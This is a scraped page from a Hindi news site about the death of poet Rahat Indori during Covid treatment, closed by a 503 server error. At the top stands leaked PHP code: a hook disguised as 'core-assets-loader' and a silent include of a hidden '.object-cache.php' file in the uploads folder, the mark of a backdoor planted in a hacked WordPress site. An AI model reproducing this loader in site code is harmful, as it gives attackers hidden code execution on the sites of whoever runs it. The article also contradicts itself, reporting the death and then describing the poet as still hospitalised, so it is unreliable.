add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मशहूर शायर राहत इंदौरी का दिल का दौरा पड़ने से निधन, कोरोना का भी चल रहा था इलाज – SOCH INDIA
Menu

देश
मशहूर शायर राहत इंदौरी का दिल का दौरा पड़ने से निधन, कोरोना का भी चल रहा था इलाज

nobanner

मशहूर शायर राहत इंदौरी का दिल का दौरा पड़ने से मंगलवार को निधन हो गया. वे कोरोना वायरस से भी संक्रमित थे, जिसके उपचार के लिए उन्हें मध्य प्रदेश के इंदौर में 10 अगस्त की देर रात अरविंदो अस्तपाल में भर्ती कराया गया था. राहत इंदौरी के बेटे सतलज ने इस बात की जानकारी दी थी, बाद में खुद भी राहत इंदौरी ने इस बारे में ट्वीट किया था.

राहत इंदौरी ने खुद भी ट्विटर पर इस बात की जानकारी दी. उन्होंने लिखा, ‘कोविड के शुरुआती लक्षण दिखाई देने पर कल मेरा कोरोना टेस्ट किया गया, जिसकी रिपोर्ट पॉज़िटिव आई है. ऑरबिंदो हॉस्पिटल में एडमिट हूं, दुआ कीजिये जल्द से जल्द इस बीमारी को हरा दूं. एक और इल्तेजा है, मुझे या घर के लोगों को फ़ोन ना करें, मेरी ख़ैरियत ट्विटर और फेसबुक पर आपको मिलती रहेगी.’

गौरतलब है कि राहत इंदौरी मशहूर शायर हैं, साथ ही वह बॉलीवुड के लिए भी कई गाने लिखते आए हैं. राहत की उम्र 70 साल है, ऐसे में उन्हें डॉक्टरों की सलाह पर अस्पताल में भर्ती किया गया है.

आपको बता दें कि मध्य प्रदेश में कोरोना वायरस का असर काफी तेजी से फैल रहा है. इंदौर भी शुरुआत में कोरोना वायरस का हॉटस्पॉट बनकर उभरा था. बीते दिनों ही मध्य प्रदेश के मुख्यमंत्री शिवराज सिंह चौहान भी कोरोना की चपेट में आए थे, हालांकि अब उन्हें अस्पताल से छुट्टी मिल चुकी है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.